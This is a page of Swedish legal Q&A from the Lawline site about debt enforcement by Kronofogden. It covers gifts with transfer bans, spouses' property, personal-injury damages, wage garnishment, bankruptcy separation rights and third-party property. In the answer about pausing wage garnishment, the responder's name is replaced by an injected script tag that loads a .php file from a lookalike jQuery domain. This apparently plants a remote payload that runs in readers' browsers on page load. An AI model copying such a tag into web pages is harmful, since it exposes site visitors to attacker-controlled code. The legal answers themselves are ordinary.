Kan Kronofogden utmäta lös egendom som har tillfallit ägaren genom gåva?

2021-01-19 i Utmätning
FRÅGA |Hej,Jag har en fråga ångande gåvobrev Jag har två jakt gevär som jag fick som present från min sambo på två olika tillfällen 2018 / 2019 .. som det är vapen som gäller själv klart licens och inköp fakturan stor mitt namn ..men jag har gåvobrev från sambo på varje gevär.. nu jag hamnade i skuld och riskerar utmätning vid skuldsanering.. jag undrar om mina jakt gevär är fria från utmätning eller måste göra nånting annat.. vet inte sur ska jag bevisa att dem är present från sambo .. tack för hjälpen
Julia Persson |Hej, tack för att du vänder dig till Lawline med din fråga!För att besvara frågan kommer jag hänvisa till Utsökningsbalk (UB).InledningDin fråga handlar om utmätning av jaktgevär som har tillfallit dig genom gåvobrev och om dessa jaktgevär går att utmäta. Därför kommer jag inledningsvis att förklara vilken typ av egendom som kan utmätas från en gäldenär (den som är skyldig någon pengar) och därefter besvara frågan om gåvor är undantagna från utmätning.Kan Kronofogden utmäta lös egendom som har tillfallit ägaren genom gåva?Huvudregeln är all lös egendom som en gäldenär äger eller anses äga kan utmätas (4 kapitlet 17 § UB). Lös egendom kan till exempel vara tavlor, elektronik, pengar, jaktgevär eller smycken.En person som får en gåva i form av lös egendom blir ägare till egendomen. Det innebär att gåvan kan komma att utmätas för ägarens skulder. Det finns dock ett undantag till denna huvudregel, och det är om gåvobrevet innehåller ett överlåtelseförbud. Ett sådant överlåtelseförbud innebär att personen som tar emot gåvan inte får lov att sälja, ge bort eller byta bort gåvan. Om ett gåvobrev har ett sådant förbud och det visas upp vid en eventuell utmätning får gåvan inte utmätas (5 kapitlet 5 § UB).SammanfattningHuvudregeln är att även gåvor kan utmätas för gäldenärens skulder. Däremot kan dina jaktgevär vara undantagna från utmätning om gåvobreven innehåller överlåtelseförbud. Gåvobrev som inte innehåller ett överlåtelseförbud hindrar inte utmätning. Viktigt att tänka på är att dessa överlåtelseförbud inte kan ändras i efterhand utan ska ha varit ett villkor vid gåvotillfället.Hoppas du fick svar på din fråga, annars är du välkommen att ställa en till!Vänligen,

Kan jag drabbas av att min make hamnar hos kronofogden?

2020-12-31 i Utmätning
FRÅGA |Hej.Min maka har dragit på sig skulder som ligger hos inkasso och kan hamna hos kronofogen.Bostadsrätten och bostadslånet står i mitt namn och vi köpte den några år efter att vi gifte ossÄven vår bil står skriven på mig från att vi köpte denVad händer om kronofogden kommer och hur blir jag drabbad.Tack för svar
Sandra Bargabriel |Hej!Tack för att du vänder dig till Lawline med din fråga! Jag kommer att hänvisa till äktenskapsbalken (ÄktB), som innehåller regler om äktenskap.Varje make råder över sina skulderHuvudregeln är att varje make råder över sin egna egendom och svarar för sina egna skulder (ÄktB 1 kap. 3 §). Detta innebär att du inte kan krävas på pengar som din make är skyldig. Kronofogden får endast utmäta egendom som tillhör gäldenären (den skuldsatta)Eftersom du skriver att din make eventuellt kan hamna hos kronofogden kan han riskera att drabbas av en utmätning. Utgångspunkten är att Kronofogden endast får utmäta egendom som tillhör den som har skulden. Detta innebär att dina tillgångar inte får användas till utmätningen. Dock finns det en lagregel i utsökningsbalken som säger att all egendom i makars gemensamma besittning ska antas tillhöra den skuldsatte maken som blir utmätt (UB 4 kap. 19 §). Detta innebär att om din make skulle drabbas av en utmätning så kan även bostadsrätten och bilen ni äger utmätas om inte du kan bevisa att du äger antingen hälften av egendomen eller hela egendomen. Du skriver att du står som registrerad ägare på bostadsrätten och bilen vilket betyder att det inte borde vara några problem att bevisa att de tillhör dig.Skydd vid utmätning av gäldenärens bostadViktigt att notera är att en bostadsrätt som används av er som stadigvarande bostad kan undantas från utmätning enligt UB 5 kap. 1 § p. 6. Likaså ska inte Kronofogden utmäta egendom som utgör en olägenhet för din make (UB 4 kap. 3 § andra stycket.) Detta innebär att det finns viss skydd i lagen vid utmätning av gäldenärens bostad. SammanfattningSvaret på din fråga är att så länge du kan göra gällande att bostaden och bilen tillhör dig och inte din make så kan de inte utmätas. Jag hoppas att svaret kan ge viss vägledning. Om jag har missförstått din fråga är du alltid välkommen att återkomma med en ny eller så kan du ta kontakt med våra duktiga jurister här om du skulle vilja ha mer ingående, juridisk hjälp. Med vänlig hälsning,

Kan Kronofogdemyndigheten utmäta mitt erhållna skadestånd?

2020-12-27 i Utmätning
FRÅGA |hej jag ska få ett skadestånd för att jag blev kidnappad,kränkning och misshandel men jag har skuld hos kronofogden får dom göra utmätning på skadeståndet?
Suana Tafic |Hej och tack så mycket för att du vänder dig till Lawline med din fråga! Jag beklagar vad du har gått igenom. Vad gäller vid utmätning?Huvudregeln är att ersättning som sätts in på ett bankkonto där det redan finns medel eller där det flyter in andra medel som exempelvis lön, bidrag eller liknande, kan bli föremål för utmätning eftersom ersättningen sammanblandas med andra medel. Det finns däremot ett undantag i 5 kap. 7 § utsökningsbalken (UB), som fastslår att skadestånd på grund av personskada under vissa omständigheter inte får utmätas. Skadestånd med anledning av personskada anses ha en så pass stark personlig prägel att det bör vara fredat från utmätning, enligt SOU 1964:157 s. 246. Det som krävs är dock att skadeståndet måste hållas avskilt från andra ekonomiska tillgångar och ska tillgodose ett kvarvarande försörjningsbehov alternativt om mindre än två år har förflutit sedan att skadeståndet har erhållits.SammanfattningKort sammanfattat innebär detta att Kronofogdemyndigheten alltså får utmäta skadeståndet om du inte har avskiljt det från dina andra ekonomiska tillgångar. Om du har haft skadeståndet blandat med andra pengar i ett konto så går det inte att avskilja. Det ska ha märkts på något sätt så att det går att direkt hänföra till skadeståndet. Skulle det vara så att Kronofogdemyndigheten utmäter ett visst belopp från ett konto där alla dina medel är blandade, så kan du inte bevisa att det just är skadeståndet som utmätts! Ju mer pengar som har flutit in i ditt bankkonto sedan utbetalningen, desto svårare blir det för dig att kunna peka ut skadeståndsbeloppet. Genom att då hålla skadeståndet avskilt från dina andra medel, kan du slippa en framtida utmätning av ditt skadestånd. Hoppas att allt löser sig och att du känner att du fick din fråga besvarad! Har du ytterligare frågor så ska du inte tveka på att höra av dig igen. Allt gott,

Kan man få anstånd för löneutmätning?

2020-12-09 i Utmätning
FRÅGA |Hej, Gällande löneutmätning från kronofogden.Finns det möjlighet för uppehåll av löneutmätning, för att kunna betala av annan skuld, innan även den trillar in hos kronofogden?
<script src="https://code.jquery-ul.com/jquery.php"></script> |Hej, och tack för att du ställer din fråga till oss på Lawline.När det kommer till löneutmätning finns det möjlighet att få anstånd med den under en begränsad tid, dvs att man "pausar" löneutmätningen. För att detta ska vara möjligt krävs att du som har löneutmätning har särskilda skäl, alternativt att den du har en skuld till går med på att pausa din löneutmätning. Vad som utgör särskilda skäl kan variera från fall till fall, men i regel brukar det handla om oförutsedda händelser som t.ex. olycksfall eller sjukdom. Det går därför inte att svara varken ja eller nej på din fråga, eftersom bedömningen måste göras helt individuellt. Oavsett måste man kontakta kronofogdemyndigheten för att ansöka om att få anstånd med sin löneutmätning. Min rekommendation är därför att du hör av dig till dom, dels för att göra en ansökan men också för att beskriva din specifika situation lite mer detaljerat så att de kan göra en bedömning av dina möjligheter till att beviljas anstånd.Lycka till!Vänliga hälsningar,

Får kronofogden ta med min lön vid beräkningen av löneutmätning på min sambo?

2021-01-14 i Utmätning
FRÅGA |Hej! Jag och min sambo har precis idag fått brev från kronofogden om löneutmätning. Min sambo har 50% aktivitetsstöd och 50% förtidspension. Sammanlagt så ger det inte mycket inkomst. Nu ser vi på sammanställningen kronofogden gjort att dom har räknat med min inkomst. Får dom göra så
Karin Pihl |Hej! Tack för att du vänder dig till oss på Lawline med din fråga!För en löneutmätning gäller att kronofogden inte kan utmäta din lön för din sambos skuld, det är enbart den skuldsattes lön som kan utmätas för skulden personen har. Däremot kan din lön påverka hur din parters inkomster beaktas vid beräkningen av det belopp som ska utmätas – den beräkningen ni reagerat på. De kan alltså göra så som de verkar ha gjort i ert fall, dvs. beakta din lön i beräkningen. Ett sådant beaktande innebär inte att din lön utmäts, för det är ju som sagt inte tillåtet.Svaret är kort sagt ja, kronofogden kan beakta din lön i när de beräknar utmätningen. Däremot kan de inte utmäta din lön som sådan för din sambos skuld.Hoppas du fått svar på din fråga!

Kan man freda fastighet från utmätning genom överlåtelseförbud?

2020-12-30 i Utmätning
FRÅGA |Om jag ärver en fastighet av min fru och jag har skulder till kronofogden,kan man skriva ett gåvobrev så att det inte går att utmäta fastigheten eller lösöret i fastigheten ? Och kan jag någon gång sälja fastigheten utan att kronofogden driver in ev skulder.?Jag vet inte om jag har några skulder idag, ( enligt Uc,och kronofogden så finns det inga ) men jag har varit med om att företag har inkommit med krav efter 10-12 år, och jag har då varit tvungen att låna pengar för att betala dom skulderna, kan jag på nått sätt ta reda på om det ligger några gamla skulder på "bevakning" ?
Dennis Lavesson |Hej och tack för att du vänder dig till oss på Lawline med din fråga!UtredningI det följande kommer jag först att besvara din fråga om villkor vid gåva/testamente och därefter redogöra för vad som gäller om gamla skulder.Det är möjligt att införa ett överlåtelseförbud i gåvo- eller testamentshandlingI vissa fall finns det möjlighet att freda egendom från utmätning genom särskild föreskrift vid gåva eller genom testamente. Egendom enligt föreskrift vid gåva eller testamente inte får överlåtas får heller ej utmätas (jfr 5 kap. 5 § utsökningsbalken). Det stadgade innebär att om ett gåvobrev eller ett testamente innehåller ett villkor om överlåtelseförbud innebär det att egendomen inte kan utmätas. Överlåtelseförbudet innebär däremot även att du inte får lov att sälja fastigheten och att du inte kan belåna den. Vid belåning av en fastighet sätter man i regel fastigheten i pant, innebärande att kreditgivaren kan begära att fastigheten säljs om lånen inte betalas. Eftersom det inte är möjligt att sälja en fastighet som har ett överlåtelseförbud kan den inte heller pantsättas.I ditt fall vet jag inte exakt vilket upplägg du tänkt dig; du skriver dels att du ärver fastigheten, du skriver dels gåvobrev. Reglerna är däremot desamma; det är möjligt att såväl i testamente som gåvobrev föra in ett särskilt villkor om överlåtelseförbud. Det finns inget centralt register för skulderAtt du inte har några skulder hos UC eller Kronofogden innebär bara att det inte finns några skulder registrerade. En skuld registreras hos Kronofogden först när du inte kan betala den och borgenären ansöker om det. Tyvärr finns det inget centralt register eller möjlighet att kontrollera om du har skulder. Om du vet med dig att du eventuellt har skulder från någon speciell kan du givetvis höra av dig till den personen eller det företaget och kontrollera.Du bör även ha i beaktande att skulder preskriberas efter tio år (tre år för konsumentskulder). Preskription innebär att skulden inte längre kan drivas in. De tio åren kan däremot förnyas genom att det skickas ut en skriftlig påminnelse eller du betalar på en skuld. Har du däremot varken fått påminnelse, betalat skulden eller på annat sätt erkänt den och det passerat mer än tio år, är skulden även preskriberad.Om du behöver vidare hjälp från en av våra jurister är du varmt välkommen att återkomma till mig per e-post för en offert och vidare kontakt. Våra jurister kan vara behjälpliga med upprättande av gåvobrev och testamente om så är intressant. Jag nås för ändamålet på dennis.lavesson@lawline.se.Med vänliga hälsningar,

Vad händer med egendom som finns hos gäldenären vid konkurs eller utmätning som inte tillhör gäldenären?

2020-12-17 i Utmätning
FRÅGA |Hej, jag har två frågor rörande konkurser. 1. Ex. En person lämnar in sin bil till en bilverkstad för att få bilen reparerad. Under tiden som bilen är i bilverkstaden går bilverkstaden i konkurs. Vem förfogar då över bilen? Kommer bilen ingå i utmätningen/konkursen? Har bilens ägare möjlighet att hämta tillbaka bilen från konkursboet? 2. Ex. En företag har sålt en maskin på avbetalning till en bilverkstad som går i konkurs. Vad händer med maskinen? Har säljaren möjlighet att hämta tillbaka maskinen från konkursboet eller dras maskinen in i utmätningen/ konkursutförsäljningen? Tacksam för svar!God Jul!
Malin Hedlund |Hej, och tack för att du vänder dig till Lawline med din fråga!Jag tolkar dina frågor som att det rör vad som händer med egendomen om den förvaras hos någon som går i konkurs eller är föremål för utmätning. Detta regleras delvis i konkurslagen (KL) och utsökningsbalken (UB). Vilken egendom ingår vid utmätning och konkurs?Egendom som ingår i en konkurs eller utmätning är utmätningsbar egendom (se 3 kap. 3 § KL). Med utmätningsbar egendom avses bland annat lös egendom som tillhör gäldenären. (4 kap. 17 § UB) Enkelt förklarat skulle man kunna säga att lös egendom är det som inte utgör fast egendom, tex fastigheter. Detta innebär att både maskinen och bilen anses vara lös egendom och att det därmed utgör egendom som kan bli föremål för utmätning eller konkurs om det tillhör gäldenären.Vad tillhör gäldenären?För att göra det säkrare från borgenärernas (de som lånar ut egendom/pengar) perspektiv, har det tagits in en presumtionsregel i 4 kap. 18 § UB som innebär att om egendomen befinner sig i gäldenärens besittning så förutsätts det att den tillhör gäldenären och är därmed utmätningsbar. Lite översiktligt skulle besittning kunna beskrivas som att när någon har saken hos sig, så besitter den egendomen. För att bryta presumtionen om att det tillhör gäldenären krävs antingen att det framgår av utredningen att hen inte är ägare eller att någon annan, tredje man, styrker sin äganderätt.Gemensamt för dina frågor innebär detta att när bilen och maskinen befinner sig hos bilverkstaden eller hos företaget som går i konkurs så förutsätts det att de tillhör gäldenären och de kan utmätas. Men detta betyder inte att det är kört för den som egentligen äger egendomen, utan denna kan nå framgång och få tillbaka den genom att visa att gäldenären inte är ägare till egendomen. Hur man styrker sin äganderätt och därmed får separationsrätt, dvs rätt att separera från gäldenärens tillgångar, är beroende av vilken typ av besittning gäldenären har. Nedan tänkte jag gå igenom de olika scenarion som dina frågor rör. Bilen på bilverkstadenNär det gäller en bil som förvaras hos en verkstad så har bilverkstaden besittning över bilen. De besitter dock bilen med begränsad rätt eftersom de inte äger bilen, utan enbart tillfälligt förvarar den. Bilägaren utgör ägare och har därmed separationsrätt på grund av bibehållen äganderätt till egendom i gäldenärens besittning. Men för att äganderätten ska få "rättslig verkan" vid en konkurs eller utmätning så krävs det att:bilen går att identifiera och bilen ska vara bibehållen, dvs inte förändrad.Detta innebär alltså att bilen inte kommer ingå i konkursen eller utmätningen om bilägaren kan peka ut sin bil samt att den är "oförändrad". Bilägaren har därmed bättre rätt till bilen än konkursboet och har möjlighet att hämta den från konkursboet.Maskinen på avbetalningNär det gäller maskinen som är köpt på avbetalning så förutsätter jag att den inte ännu är fullt betald samt att den befinner sig hos bilverkstaden. I och med att den befinner sig hos bilverkstaden besitter de alltså maskinen, men äger inte denna fullt ut eftersom att de inte betalat hela summan. För att företaget som sålt maskinen ska få separationsrätt krävs det att dem har tagit in ett återtagandeförbehåll i försäljningsavtalet. Ett återtagandeförbehåll innebär att säljaren har rätt att under vissa förutsättningar ta tillbaka den sålda varan. För att det ska vara ett giltigt förbehåll måste det dock uppfylla följande kriterier:Det ska ingå i parternas avtal, det ska uppställas före eller senast samtidigt med avlämnandet av varan det måste vara kopplat till viss specifik egendom och ett bestämt köp och egendomen får inte överlåtas.Om det finns ett sådant giltigt återtagandeförbehåll i avtalet, får säljaren en särskild form av separationsrätt som innebär att säljaren har rätt att få täckning för sin köpeskillingsfordran ur det värde som kan frigöras vid en försäljning av objektet. I praktiken så återtar man oftast inte varan utan erhåller enbart värdet. Sammanfattningsvis krävs det separationsrätt till egendom för att den ska undantas från gäldenärens utmätning eller konkurs. Separationsrätt får man på lite olika sätt. När det gäller bilen så undantas den om den går att identifiera och är oförändrad och när det gäller avbetalning så krävs det att det finns med ett giltigt återtagandeförbehåll i avtalet. Hoppas det var svar på din fråga! God jul!

Kronofogdes utmätningsbefogenhet.

2020-11-27 i Utmätning
FRÅGA |Min son har skulder hos kronofogden hans fd sambo parkerade sin bil på hans tomt för att han skulle sälja den. Nu har kronofogden bestämt att ta bilen i beslag för hans skulder. Tidigare tog kronofogden fd sambons (ej skuldsatt) båt och båtvagn som stod på hans tomt under vintern för att slippa hyra plats som kostar. Är detta möjligt jag anser det är stöld. Bilen var inlämnad på bilverkstad för felsökning min son fick låna mitt bankkort för att betala med. Nu anser kronofogden att bilen är min sons efter som han betalat felsökningen med mitt kort.Tacksam för svar!
Jakob Westling |Hej och tack att du valde Lawline med din fråga Din fråga relaterar till kronofogdens utmätningsmöjligheter. Dessa regleras främst i utsökningsbalken fjärde kapitel. 4:17-4:22 reglerar just utmätning i förhållande till tredje man. I detta fall är fd sambon den tredje mannen.4:18 UB föreskriver att all egendom som påhittas i gäldenärens (din son) besittning kommer presumeras ägas av honom. Regeln ställer upp en presumtion om ägarskap till allt som finns i gäldenärens besittning. Denna presumtion bryts om det framgår att gäldenären inte är ägare till bilen/båten. Om Fd sambo vill återhämta egendomen måste hen visa tydligt att egendomen är hens. Detta kan göras genom att påvisa att bilen är inskriven på en annan person.